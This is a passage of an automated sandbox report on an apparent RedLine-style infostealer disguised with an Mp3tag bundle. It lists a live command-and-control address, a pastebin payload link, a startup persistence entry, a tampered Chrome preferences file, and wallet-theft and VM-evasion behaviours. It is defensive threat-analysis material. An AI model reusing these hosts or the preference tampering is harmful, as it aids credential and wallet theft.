disk) 29->94 96 Maps a DLL or memory area into another process 29->96 98 Switches to a custom stack to bypass stack traces 29->98 33 MSBuild.exe 15 20 29->33         started        38 conhost.exe 29->38         started        signatures14 process15 dnsIp16 54 45.141.87.55, 15647, 49787, 49794 CLOUDBACKBONERU Russian Federation 33->54 46 C:\Users\user\AppData\...\Secure Preferences, JSON 33->46 dropped 76 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 33->76 78 Found many strings related to Crypto-Wallets (likely being stolen) 33->78 80 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 33->80 82 2 other signatures 33->82 file17 signatures18

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            file.exe5%ReversingLabs

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\Users\user\AppData\Local\Temp\umfcpwvoouwjq100%AviraTR/Agent.edjbt
                            C:\Users\user\AppData\Local\Temp\lcqqpedjyaav100%AviraTR/Agent.edjbt
                            C:\Users\user\AppData\Local\Temp\umfcpwvoouwjq100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\lcqqpedjyaav100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exe0%ReversingLabs
                            C:\Users\user\AppData\Local\Temp\Bijouterie\tak_deco_lib.dll5%ReversingLabs
                            C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exe0%ReversingLabs
                            C:\Users\user\AppData\Roaming\Downloadplugin\tak_deco_lib.dll5%ReversingLabs

                            Unpacked PE Files

                            No Antivirus matches

                            Domains

                            No Antivirus matches

                            URLs

                            SourceDetectionScannerLabelLink
                            https://community.mp3tag.de/0%Avira URL Cloudsafe
                            http://45.141.87.55:9000/wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE0%Avira URL Cloudsafe
                            https://docs.mp3tag.de/credits/Y:0%Avira URL Cloudsafe
                            https://gnudb.orgErrorFound0%Avira URL Cloudsafe
                            http://schemas.datacontract.org/2004/07/h0%Avira URL Cloudsafe
                            http://ns.adob0%Avira URL Cloudsafe
                            https://www.mp3tag.de/en/donations.html0%Avira URL Cloudsafe
                            https://www.mp3tag.de/en/privacy.htmlpos0%Avira URL Cloudsafe
                            https://community.mp3tag.de/pStaticSupport0%Avira URL Cloudsafe
                            https://www.mp3tag.de/en/donations.htmlpStaticDonate0%Avira URL Cloudsafe
                            http://45.141.87.55:90000%Avira URL Cloudsafe
                            https://docs.mp3tag.de/credits/0%Avira URL Cloudsafe
                            https://community.mp3tag.deCMTMainFrame::OnHelpSupportCMTMainFrame::CheckMailAdressCMTMainFrame::Ref0%Avira URL Cloudsafe
                            https://download.mp3tag.de/versions.xmlCMTUpdater::HandleLatestVersion0%Avira URL Cloudsafe
                            https://www.mp3tag.de0%Avira URL Cloudsafe
                            http://purl.oent0%Avira URL Cloudsafe

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            bg.microsoft.map.fastly.net
                            		199.232.214.172
                            		truefalse
                              		high
                              s-part-0035.t-0009.t-msedge.net
                              		13.107.246.63
                              		truefalse
                                		high
                                time.windows.com
                                		unknown
                                		unknownfalse
                                  		high

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://45.141.87.55:9000/wbinjget?q=ABEE5D020398559D1CCC81B5F72669AEtrue
                                  • Avira URL Cloud: safe
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://www.discogs.com/oauth/authorizeMp3tag.exefalse
                                    		high
                                    https://community.mp3tag.de/Mp3tag.exefalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://sectigo.com/CPS0Mp3tag.exefalse
                                      		high
                                      http://www.vmware.com/0Mp3tag.exe, 00000007.00000002.1384095495.0000000002D8C000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1504119662.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1779056254.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1821063207.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2055733170.00000000051E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0Mp3tag.exefalse
                                          		high
                                          http://ocsp.sectigo.com0Mp3tag.exefalse
                                            		high
                                            https://community.mp3tag.de/pStaticSupportMp3tag.exefalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://schemas.datacontract.org/2004/07/MSBuild.exe, 0000000E.00000002.2525529925.0000000002411000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2525529925.0000000002689000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://api.discogs.com/oauth/identityvwSgWuuGMPKbPEOYNTFNZsDQawYvtlmt?oauth_token=https://api.discoMp3tag.exefalse
                                                		high
                                                https://api.discogs.com/oauth/access_tokenMp3tag.exefalse
                                                  		high
                                                  https://www.mp3tag.de/en/privacy.htmlposMp3tag.exefalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#Mp3tag.exefalse
                                                    		high
                                                    https://www.mp3tag.de/en/donations.htmlMp3tag.exefalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.vmware.com/0/Mp3tag.exe, 00000007.00000002.1384095495.0000000002D8C000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1504119662.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1779056254.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1821063207.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2055733170.00000000051E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://gnudb.org/%s/%s(artistalbumMp3tag.exefalse
                                                        		high
                                                        http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#Mp3tag.exefalse
                                                          		high
                                                          http://musicbrainz.orgMp3tag.exefalse
                                                            		high
                                                            http://www.symauth.com/cps0(Mp3tag.exe, 00000007.00000002.1384095495.0000000002D8C000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1504119662.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1779056254.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1821063207.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2055733170.00000000051E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://ns.adobMSBuild.exe, 0000000E.00000002.2536124574.0000000007542000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://gnudb.orgErrorFoundMp3tag.exefalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://pastebin.com/raw/XK7ARdVwPOMSBuild.exe, 00000014.00000002.2057624072.00000000032C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tMp3tag.exefalse
                                                                  		high
                                                                  http://schemas.datacontract.org/2004/07/dMSBuild.exe, 0000000E.00000002.2525529925.0000000002689000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://docs.mp3tag.de/credits/Y:Mp3tag.exefalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://schemas.datacontract.org/2004/07/hMSBuild.exe, 0000000E.00000002.2525529925.0000000002689000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://www.mp3tag.de/en/donations.htmlpStaticDonateMp3tag.exefalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0yMp3tag.exefalse
                                                                      		high
                                                                      http://www.symauth.com/rpa00Mp3tag.exe, 00000007.00000002.1384095495.0000000002D8C000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1504119662.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1779056254.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1821063207.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2055733170.00000000051E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.mp3tag.deMp3tag.exefalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#Mp3tag.exefalse
                                                                          		high
                                                                          https://pastebin.com/raw/XK7ARdVwMSBuild.exe, 00000014.00000002.2057624072.00000000032C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.info-zip.org/Mp3tag.exe, Mp3tag.exe, 0000000F.00000002.1821063207.0000000002C59000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2055733170.000000000519C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://docs.mp3tag.de/credits/Mp3tag.exefalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://community.mp3tag.deCMTMainFrame::OnHelpSupportCMTMainFrame::CheckMailAdressCMTMainFrame::RefMp3tag.exefalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://purl.oentMSBuild.exe, 0000000E.00000002.2536124574.0000000007542000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMSBuild.exe, 0000000E.00000002.2525529925.0000000002411000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://45.141.87.55:9000MSBuild.exe, 0000000E.00000002.2525529925.0000000002411000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://api.discogs.com/oauth/identityMp3tag.exefalse
                                                                                  		high
                                                                                  https://download.mp3tag.de/versions.xmlCMTUpdater::HandleLatestVersionMp3tag.exefalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://api.discogs.com/oauth/request_tokenMp3tag.exefalse
                                                                                    		high

                                                                                    World Map of Contacted IPs

                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs

                                                                                    Public IPs

                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    45.141.87.55
                                                                                    		unknownRussian Federation
                                                                                    		56971CLOUDBACKBONERUtrue

                                                                                    General Information

                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                    Analysis ID:1560988
                                                                                    Start date and time:2024-11-22 15:47:06 +01:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 10m 41s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                    Number of analysed new started processes analysed:22
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:0
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample name:file.exe
                                                                                    Detection:MAL
                                                                                    Classification:mal100.troj.spyw.evad.winEXE@16/28@1/1
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 80%
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 99%
                                                                                    • Number of executed functions: 216
                                                                                    • Number of non-executed functions: 77
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .exe

                                                                                    Warnings

                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                    • Excluded IPs from analysis (whitelisted): 40.81.94.65, 4.245.163.56, 2.20.68.210, 2.20.68.201, 20.242.39.171, 23.193.114.26, 23.193.114.18
                                                                                    • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, twc.trafficmanager.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, azureedge-t-prod.trafficmanager.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                    • Execution Graph export aborted for target Mp3tag.exe, PID 1476 because there are no executed function
                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                    • VT rate limit hit for: file.exe

                                                                                    Simulations

                                                                                    Behavior and APIs

                                                                                    TimeTypeDescription
                                                                                    11:11:33API Interceptor270478x Sleep call for process: MSBuild.exe modified
                                                                                    17:11:17AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fzcheck.lnk

                                                                                    Joe Sandbox View / Context

                                                                                    IPs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    45.141.87.55file.exeGet hashmaliciousRedLineBrowse
                                                                                      Adobe.exeGet hashmaliciousRedLineBrowse
                                                                                        Adobe.exeGet hashmaliciousRedLineBrowse
                                                                                          EarthTime.exeGet hashmaliciousRedLineBrowse
                                                                                            SecuriteInfo.com.Trojan.InjectNET.17.6536.18785.exeGet hashmaliciousRedLineBrowse
                                                                                              IfI57VopHd.exeGet hashmaliciousFicker StealerBrowse

                                                                                                Domains

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                s-part-0035.t-0009.t-msedge.netfile.exeGet hashmaliciousLummaCBrowse
                                                                                                • 13.107.246.63
                                                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                • 13.107.246.63
                                                                                                https://qrcodeveloper.com/code/87JgljWuQCR6OeirGet hashmaliciousUnknownBrowse
                                                                                                • 13.107.246.63
                                                                                                hx0XzDVE1J.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                • 13.107.246.63
                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                • 13.107.246.63
                                                                                                SekpL8Z26C.exeGet hashmaliciousUnknownBrowse
                                                                                                • 13.107.246.63
                                                                                                DelightfulCard.dll.dllGet hashmaliciousUnknownBrowse
                                                                                                • 13.107.246.63
                                                                                                http://acsltddocu3.technolutionszzzz.net/Get hashmaliciousUnknownBrowse
                                                                                                • 13.107.246.63
                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                • 13.107.246.63
                                                                                                STMod_32bit.exeGet hashmaliciousUnknownBrowse
                                                                                                • 13.107.246.63
                                                                                                bg.microsoft.map.fastly.netfilepdf.pdf.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                                • 199.232.214.172
                                                                                                VKXD1NsFdC.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                • 199.232.210.172
                                                                                                hx0XzDVE1J.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                • 199.232.214.172
                                                                                                PZI8hMQHWg.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                • 199.232.210.172
                                                                                                lIUubnREXh.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                • 199.232.214.172
                                                                                                cFIg55rrfH.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                • 199.232.210.172
                                                                                                VKXD1NsFdC.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                • 199.232.214.172
                                                                                                jsYhI4KOpg.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                • 199.232.210.172
                                                                                                phish_alert_sp2_2.0.0.0 (6).emlGet hashmaliciousUnknownBrowse
                                                                                                • 199.232.214.172
                                                                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                • 199.232.214.172

                                                                                                ASNs

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                CLOUDBACKBONERUnet.zipGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                • 45.141.87.50
                                                                                                file.exeGet hashmaliciousRedLineBrowse
                                                                                                • 45.141.87.55
                                                                                                Adobe.exeGet hashmaliciousRedLineBrowse
                                                                                                • 45.141.87.55
                                                                                                Adobe.exeGet hashmaliciousRedLineBrowse
                                                                                                • 45.141.87.55
                                                                                                SecuriteInfo.com.Win32.SpywareX-gen.216.26731.exeGet hashmaliciousDanaBotBrowse
                                                                                                • 45.156.25.118
                                                                                                SecuriteInfo.com.Win32.SpywareX-gen.216.26731.exeGet hashmaliciousDanaBotBrowse
                                                                                                • 45.156.25.118
                                                                                                EarthTime.exeGet hashmaliciousRedLineBrowse
                                                                                                • 45.141.87.55
                                                                                                XpCyBwDzEt.exeGet hashmaliciousAmadey, Clipboard Hijacker, CryptOne, Cryptbot, DanaBot, PureLog Stealer, RedLineBrowse
                                                                                                • 45.156.25.118
                                                                                                file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                • 45.156.23.96
                                                                                                file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                • 45.156.23.96

                                                                                                JA3 Fingerprints

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                28a2c9bd18a11de089ef85a160da29e4file.exeGet hashmaliciousLummaCBrowse
                                                                                                • 13.107.246.63
                                                                                                Payment CCF20240531_0002.htmlGet hashmaliciousUnknownBrowse
                                                                                                • 13.107.246.63
                                                                                                http://cl4ycra.hgzcbqsqumhkfshql.com/kxosbfkveGet hashmaliciousUnknownBrowse
                                                                                                • 13.107.246.63
                                                                                                https://b0.antidisesta1.com/HX8hiLPadaz1N7WrltpPjHg34q_2C98ig/#Xlhixacc.orgGet hashmaliciousUnknownBrowse
                                                                                                • 13.107.246.63
                                                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                • 13.107.246.63
                                                                                                http://cdn.prod.website-files.com/65dccdc21b806b929439370e/66e00f5491860971b9b9ef25_80703488528.pdfGet hashmaliciousUnknownBrowse
                                                                                                • 13.107.246.63
                                                                                                https://qrcodeveloper.com/code/87JgljWuQCR6OeirGet hashmaliciousUnknownBrowse
                                                                                                • 13.107.246.63
                                                                                                http://rfmdocument.technolutionszzzz.netGet hashmaliciousUnknownBrowse
                                                                                                • 13.107.246.63
                                                                                                https://www.google.co.ls/amp/s/2mzptv.s3.us-east-1.amazonaws.com/qr.htmlGet hashmaliciousUnknownBrowse
                                                                                                • 13.107.246.63
                                                                                                https://myqrcode.mobi/qr/3c3aa5e1/viewGet hashmaliciousUnknownBrowse
                                                                                                • 13.107.246.63

                                                                                                Dropped Files

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exehttps://recaptcha-checking-v3.b-cdn.net/verifyme.htmlGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                  verify-captcha-987.b-cdn.net.ps1Get hashmaliciousClipboard HijackerBrowse
                                                                                                    verifyhuman476.b-cdn.net.ps1Get hashmaliciousClipboard HijackerBrowse
                                                                                                      https://streamvideox.b-cdn.net/HD-video-downloaders.htmlGet hashmaliciousClipboard HijackerBrowse
                                                                                                        release_resources.imgGet hashmaliciousLummaCBrowse

                                                                                                          Created / dropped Files

                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):15130
                                                                                                          Entropy (8bit):5.544742646813256
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:xVknXBx1kXqKf/pUZNCgVLH2HfCdIrUobHGkkn/9r3J:xmXBx1kXqKf/pUZNCgVLH2Hf+IrUorGX
                                                                                                          MD5:C0759C17471FB74ADB6FB4C4997D5AB5
                                                                                                          SHA1:96234048EA455CEB6C017C469095D466F32A838B
                                                                                                          SHA-256:BA8599CA3F7BD51FA818877BFBD703C91FCF1868C1AA64628A2514A65DC5EC02
                                                                                                          SHA-512:EB4A9E7C76C751FAAEEE5364CF83CA97D8B2572AD0F424403298E64AD99395555ECF565495214137505578CD3CC7F82969E3600EC338F80DD5200372A6CA6A5D
                                                                                                          Malicious:true
                                                                                                          Reputation:low
                                                                                                          Preview:{"download":{"directory_upgrade":true,"always_open_pdf_externally":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:tbz2:lz:msi"},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13340965310875704","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13340965310875704","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, e

                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MSBuild.exe.log

                                                                                                          Download File
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):410
                                                                                                          Entropy (8bit):5.361827289088002
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:Q3La/KDLI4MWuPTAq1KDLI4M0kvoDLI4MWuCv:ML9E4KH1qE4jE4Ks
                                                                                                          MD5:812F0A8C671812AA613FC139B69E8614
                                                                                                          SHA1:B4177437C50B25B06FB885362DA36FD171A1C5A9
                                                                                                          SHA-256:6D3DF2C3EA20D3A411078200AFA62DAC6AABA4210C83A2186E80195977BF0F89
                                                                                                          SHA-512:6A82C1F195C66FCC0533B20B8AE9B4F9CEBED6C8D7B450C574E864A60D627F3ABE32081BF65822157716F4672180E19C0DFA91D88663F7FC3CBE7FD0EB36B2EA
                                                                                                          Malicious:false
                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

                                                                                                          C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exe

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12606192
                                                                                                          Entropy (8bit):6.431140800392858
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:98304:ReAtQzKADvk/9TEaImN9/tiHBIn8c3hCEFRUTaZnPZOtXwH:ReAOWOM/FE1mNHiFc3hr7UTaZnhOtXwH
                                                                                                          MD5:A7118DFFEAC3772076F1A39A364D608D
                                                                                                          SHA1:6B984D9446F23579E154EC47437B9CF820FD6B67
                                                                                                          SHA-256:F1973746AC0A703B23526F68C639436F0B26B0BC71C4F5ADF36DC5F6E8A7F4D0
                                                                                                          SHA-512:F547C13B78ACDA9CA0523F0F8CD966C906F70A23A266AC86156DC7E17E6349E5F506366787E7A7823E2B07B0D614C9BD08E34CA5CC4F48799B0FE36AC836E890
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Joe Sandbox View:
                                                                                                          • Filename: , Detection: malicious, Browse
                                                                                                          • Filename: verify-captcha-987.b-cdn.net.ps1, Detection: malicious, Browse
                                                                                                          • Filename: verifyhuman476.b-cdn.net.ps1, Detection: malicious, Browse
                                                                                                          • Filename: , Detection: malicious, Browse
                                                                                                          • Filename: release_resources.img, Detection: malicious, Browse
                                                                                                          Preview:MZ......................@...................................P...........!..L.!This program cannot be run in DOS mode....$.........O...!...!...!..."...!...!...!.j.....!...&...!...%...!...$.J.!...'...!.j.%...!.j."...!.j.$...!...$...!...%...!.[.%.<.!.[.$...!... ...!... ...!... ...!.[.(...!.[.....!.......!.[.#...!.Rich..!.................PE..d...%ZPf..........#....'.....XA......zG........@.............................P......)..... ..........................................................@...............2...(..............T.......................(...@...@............................................text...|........................... ..`.rdata..P@.......B..................@..@.data............$.................@....pdata..............................@..@_RDATA.......0.......&..............@..@.rsrc........@.......(..............@..@................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Local\Temp\Bijouterie\fgq

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1278049
                                                                                                          Entropy (8bit):7.944499847118911
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24576:fokKHi3OWK6EmjunuvpzGBmg758xHXfkQBabgiNJfaM9t2lc:g9HizcmjuMpqBwz4Jf3t2u
                                                                                                          MD5:F6461CCD814A2EAD19BEEBA2125B5368
                                                                                                          SHA1:449EDE26EEB5234F02A9D4B5A19FA7B6FFC4A1DF
                                                                                                          SHA-256:8FB4E6D589830F39DB50877B542B11281E56762CAAA2742719B2AC042DD6CBD1
                                                                                                          SHA-512:FA8C7368597D79451FC47447EA1AC9E831B2B7835C6542A161BD74B0084DA66FFF4AC0555DCE0EEA64630887A2D953674125B1E2E9295A37B7BAC678DC606FCD
                                                                                                          Malicious:false
                                                                                                          Preview:...yH.u.ErA..`G...C..VsP..A..^e.K.B..pmsI.xk.S...i...K.b...G.dS..m.hm.BK..._.J.w]BluumQ..dds.W..J...c.F\...f.ReMS.oP.r..oTtf`..t.yb..t..sfYd......y.\nHI.oc.a.aoZ^p....U.rG_bGs.[^......s..M.B....CT..XJ.]hU.H.QS....LV.iy.H.hqXS_.pZ..D..c..C..K.F..v..V.g....cBU......b.f...U[.U\..Ok..d..A^...c.\..Pi..Abu..W.D....K..JS......r..m...P.CQM].b..s..HpA.._L._.p.I.t...sg.vVSn...FoGW...c.m..o.Q._w.[Rg...[KE..IN..yH...IR`NGyLp..nVL.h..xu.W.e.qTn.KyBvd^TVoO^.AcJ..Q..i.f..CiniB.ME.DL..T....GYO.X..r.._....uD.F....\..Y.d..wwD.hcs_..V]......u]..EX.y.feu._jA.Ktm.KcQf...tEN.MA.Z.MGuKPnHtY\uGy.h]..C.T....O....dS]..M[..f[^cm^....\.^.......XT.i.k.....K.JwL.l.\K.lky......oS...N......B...Jd....cy..V.THi..L..prd..Z.F..m^....bb.iY.EEbR...Jh.N...YFZ.e..E.aR.Rao.WO.........qXaN]W..v^.uN...rP.I...uf^.Uj[.vnO..h^AH.lS...QQ.CX..fo..o...oE...U.tGckC....Cl.....K._.g.s.Y.YRC..Z.F.D.....KdN.MVW].\y.VYHJ..aWg.RE.DW..eHLm..\.eMR......j..uV...].....ZcL..\.okD..Bs....SZ[...`R.lt.mDS.PE.hH]....EpO]....UZT..JN.....w.E.kP.K..[jN

                                                                                                          C:\Users\user\AppData\Local\Temp\Bijouterie\tak_deco_lib.dll

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):323072
                                                                                                          Entropy (8bit):5.886344944882455
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3072:h0b/GJ1RdK6UwambkfOhOmesG+4ny2lV07j4:ayFs2IfmRHAyQVc
